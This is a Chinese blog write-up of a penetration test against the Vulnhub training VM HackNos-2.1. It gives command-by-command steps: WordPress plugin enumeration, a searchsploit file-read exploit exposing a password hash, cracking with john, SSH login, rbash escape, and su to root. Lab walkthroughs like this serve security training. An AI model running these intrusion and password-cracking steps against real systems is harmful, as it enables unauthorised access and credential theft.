Vulnhub——HackNos-2.1

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/hacknos/Os-hackNos-2.1.ova

Vulnhub靶机安装:

0.靶机配置

将下载下来的靶机文件Os-hackNos-2.1.ova导入到vm中

 

导入后,因为无法获取ip地址,故需要进行设置配置

需要在启动界面点击shift进入如下界面按下e

 

向下翻动,将ro改为rw single init=/bin/bash

然后按下 ctrl+x进入shell

使用ip a查看网卡名

使用 :q退出后

使用vim /etc/netplan/50-cloud-init.yaml进行编辑,此处将错误的网卡改为ens33

1.信息收集

1.1主机发现

在kali里使用netdiscover发现主机

攻击机机:kali IP :192.168.245.129 靶机IP :192.168.245.132

1.2查看端口

nmap -sV -p- 192.168.245.132

 可以发现开启了22端口和80端口

先访问一下80端口:http://192.168.245.132:80 熟悉以下界面

 1.3目录扫描

dirb http://192.168.245.132 

 访问:http://192.168.245.132/tsweb/

 

使用WpScan 扫描一下后台 发现了一个插件 searchsploit搜索我们本地漏洞库看看有没有漏洞

  • -e是表示开启枚举模式,
  • p是代表枚举所有的插件(plugins)
wpscan --url http://192.168.245.132/tsweb -e p

2.漏洞利用 

2.1从kali上搜索本地是否存在gracemedia-media-player插件的poc

searchsploit gracemedia
cat /usr/share/exploitdb/exploits/php/webapps/46537.txt

 

 可以看到有这么一行

flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash 

 2.2接下来我们破解flag的密码
kali执行如下命令:

echo 'flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/' > 1.txt 
gunzip /usr/share/wordlists/rockyou.txt.gz
john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt --format=md5crypt 

2.3ssh登陆

ssh flag@192.168.245.132
密码:topsecret

cat /etc/passwd | grep bash

 发现并没有可以利用的 ,因此需要要换个思路,可能存在什么备份文件之类的 ,passwd文件中有一个叫rohit的用户,发现没有权限。

 

可以看到我们当前的flag用户是一个rbash权限,比较低,所以执行不了cd命令,我们输入sh重新启动一个标准shell即可
然后输入:

sh
cd /var/backups/passbkp  //这里存放着密码备份信息

进入sh 查看备份文件里面的md5-hash 复制出来使用john再次进行爆破

 获得密码 !%hack41

 sudo su 提权

su rohit
密码:!%hack41

 家目录下的txt文件即我们最终获取文件

cd ~
ls
cat root.txt

 至此获取到了flag,渗透测试结束。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值